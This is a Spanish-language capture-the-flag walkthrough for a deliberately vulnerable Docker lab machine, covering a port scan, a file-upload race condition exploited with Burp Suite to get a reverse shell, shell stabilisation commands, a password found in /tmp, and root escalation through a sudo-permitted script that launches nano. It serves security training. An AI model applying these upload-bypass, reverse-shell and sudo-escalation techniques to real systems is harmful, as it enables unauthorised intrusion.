Cuando obtenemos el .zip nos lo pasamos al entorno en el que vamos a empezar a hackear la maquina y haremos lo siguiente.
unzipparalele.zip
Nos lo descomprimira y despues montamos la maquina de la siguiente forma.
bashauto_run.shparalele.tar
Info:
██████╗ ██╗ ██╗███╗ ██╗██████╗ ██████╗ ██╗
██╔══██╗██║ ██║████╗ ██║╚════██╗██╔══██╗██║
██████╔╝██║ █╗ ██║██╔██╗ ██║ █████╔╝██║ ██║██║
██╔═══╝ ██║███╗██║██║╚██╗██║ ╚═══██╗██║ ██║╚═╝
██║ ╚███╔███╔╝██║ ╚████║██████╔╝██████╔╝██╗
╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═╝
==
@+:@ @##@
@++:-----+@ @@#+:----:+#
#-+-----:+:---------:
*::-----++-----::::#
::------+:--------:
#-+------+:-::-----#@
*::+=@@#++-------::@
@+= @++::+#@@@#*#
#-@
*+#++@
+-:::+-@
:-:+:::+
@+::*::::
*::++-::*
=:--:-:++ @-#
#*:---:--++@ @@
@::-:--++*
@::-:++#
*++*
:: Plataforma de máquinas vulnerables ::
:: Desarrollado por Pwn3d! y Dockerlabs - creado por @d1se0 ::
█▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█
█ FLAG{Pwn3d!_is_awesome!} █
█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█
[✔] bc ya está instalado.
[✔] Docker ya está instalado
[!] Limpiando previos contenedores e imágenes
[✔] Cargando la máquina virtual
[✔] Activando máquina virtual
[✔] Máquina activa. Dirección IP: 172.17.0.2
[!] Presiona Ctrl+C para limpiar y salir
Por lo que cuando terminemos de hackearla, le damos a Ctrl+C y nos eliminara la maquina para que no se queden archivos basura.
Escaneo de puertos
Info:
Veremos que solo tendremos un puerto 80, si entramos dentro del mismo veremos una pagina web normal en la que nos podremos registrar con un usuario, si lo hacemos e iniciamos sesion veremos que nos permite cambiar la foto de perfil del usuario con el cual nos hemos registrado.
Pero en la descripcion veremos que solamente permite archivos JPG/PNG por lo que vamos a subir un archivo normal de imagen, para ver donde se guardan.
Echo eso, veremos que se guarda en la carpeta /uploads, si probamos a subir un archivo PHP no nos dejara, vamos abrir BurpSuite para capturar la peticion de subida de archivo y veremos lo siguiente:
test.php
Peticion Subida de archivo
Vamos a probar a cambiar el tipo por text/html para que haya una mejor compatabilidad por si acaso, pero aun asi no nos deja, vamos a mandarlo al repeater con el Ctrl+R, ahora tambien mandaremos al repeater la otra peticion para poder leer el archivo que se deposita en /uploads de las imagenes teniendo algo asi:
Peticion Leer archivo
Vamos a probar una vulnerabilidad llamada File Upload Race Condition / Time-of-Check-to-Time-of-Use (TOCTOU) vamos a enviar una peticion en paralelo, para que se envie la primera que es la subida del archivo y la segunda a la misma vez que es para leer el archivo en cuestion de milesimas, para que al leerlo lo ejecute y obtengamos una shell, por lo que tendremos que configurar BurpSuite en el Repeater de la siguiente forma:
peticion1 (Enviar archivo)
peticion2 (Entrar en archivo)
Tendremos que crear un grupo en BurpSuite de peticiones en la parte de Repeater donde hay un +, seleccionamos las peticiones y a crear, si todo sale bien, veremos esto:
Ahora vamos a darle a la felchita donde pone Send y veremos un desplegable el cual seleccionaremos la opcion llamada Send group in paralle (last-byte sync) con esto lo que haremos sera enviar las dos peticiones de forma simultanea.
Nos pondremos a la escucha antes de enviar nada.
Si enviamos estas peticiones en paralelo y funcionara, podremos ver lo siguiente donde tenemos la escucha:
Sanitización de shell (TTY)
Escalate user paralele69
Si enumeramos un poco veremos en la carpeta /tmp el siguiente archivo:
Si leemos el archivo veremos lo siguiente:
Veremos lo que parece ser la contraseña en Base64 del usuario paralele69, si lo decodificamos veremos esto:
Info:
Si lo probamos en dicho usuario veremos que no funcionara, si probamos el mismo Base64 tampoco funcionara, pero si probamos como contraseña el nombre del propio archivo, veremos que si funciona.
Metemos como contraseña SuperMegaUltraPasswordSecret y veremos que estaremos dentro, por lo que leeremos la flag del usuario.
user.txt
Escalate Privileges
Si hacemos sudo -l veremos lo siguiente:
Veremos que podemos ejecutar el script email.sh como el usuario root, por lo que vamos a leer el script a ver que pone por dentro.
Vemos que es un script muy simple, pero si leemos el help en la opcion -n veremos que ejecuta un nano por lo que si lo ejecutamos como root se estara ejecutando nano como root y podremos obtener una shell de esta forma:
Info:
Con esto veremos que ya seremos root, por lo que leeremos la flag de root.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-19 06:35 EDT
Nmap scan report for 172.17.0.3
Host is up (0.00012s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: CTF Upload
|_http-server-header: Apache/2.4.58 (Ubuntu)
MAC Address: 02:42:AC:11:00:03 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.57 seconds
listening on [any] 7777 ...
connect to [192.168.177.129] from (UNKNOWN) [172.17.0.2] 49998
whoami
www-data
script /dev/null -c bash
# <Ctrl> + <z>
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
# Para ver las dimensiones de nuestra consola en el Host
stty size
# Para redimensionar la consola ajustando los parametros adecuados
stty rows <ROWS> columns <COLUMNS>
total 12
drwxrwxrwt 1 root root 4096 Aug 19 12:31 .
drwxr-xr-x 1 root root 4096 Aug 19 12:27 ..
-rw-r--r-- 1 root root 48 Aug 19 11:47 SuperMegaUltraPasswordSecret.txt
Matching Defaults entries for paralele69 on c9b500ac7efe:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User paralele69 may run the following commands on c9b500ac7efe:
(ALL : ALL) NOPASSWD: /usr/local/bin/email.sh
#!/bin/bash
# ========================================
# Tool: MsgTool - Simple message manager
# Author: Profesional Script
# Description: Guardar mensajes en archivos locales y abrirlos con nano
# ========================================
# Variables
MSG_DIR="./messages"
mkdir -p "$MSG_DIR"
# Función de ayuda
function show_help() {
cat << EOF
Usage: $0 [OPTION] [MESSAGE]
Opciones:
-h, --help Muestra esta ayuda
-n Abrir el editor nano para escribir un mensaje
-l, --list Listar todos los mensajes guardados
-r, --read FILE Leer un mensaje específico
-d, --delete FILE Borrar un mensaje específico
Si se proporciona un mensaje sin opciones, se guardará en un archivo con fecha y hora.
EOF
}
# Función para listar archivos
function list_messages() {
echo "Mensajes guardados en $MSG_DIR:"
ls -1 "$MSG_DIR"
}
# Función para leer mensaje
function read_message() {
local file="$MSG_DIR/$1"
if [[ -f "$file" ]]; then
echo "===== $1 ====="
cat "$file"
echo "=============="
else
echo "Error: El archivo '$1' no existe."
exit 1
fi
}
# Función para borrar mensaje
function delete_message() {
local file="$MSG_DIR/$1"
if [[ -f "$file" ]]; then
rm -f "$file"
echo "Archivo '$1' borrado correctamente."
else
echo "Error: El archivo '$1' no existe."
exit 1
fi
}
# Función para guardar mensaje
function save_message() {
local content="$1"
local filename="msg_$(date +'%Y%m%d_%H%M%S').txt"
echo "$content" > "$MSG_DIR/$filename"
echo "Mensaje guardado en $MSG_DIR/$filename"
}
# Función para abrir nano
function nano_message() {
local filename="msg_$(date +'%Y%m%d_%H%M%S').txt"
nano "$MSG_DIR/$filename"
echo "Mensaje guardado en $MSG_DIR/$filename"
}
# ======== MAIN ========
if [[ $# -eq 0 ]]; then
show_help
exit 0
fi
case "$1" in
-h|--help)
show_help
;;
-n)
nano_message
;;
-l|--list)
list_messages
;;
-r|--read)
if [[ -z "$2" ]]; then
echo "Error: Debes indicar el nombre del archivo a leer."
exit 1
fi
read_message "$2"
;;
-d|--delete)
if [[ -z "$2" ]]; then
echo "Error: Debes indicar el nombre del archivo a borrar."
exit 1
fi
delete_message "$2"
;;
*)
# Guardar mensaje directamente
save_message "$*"
;;
esac
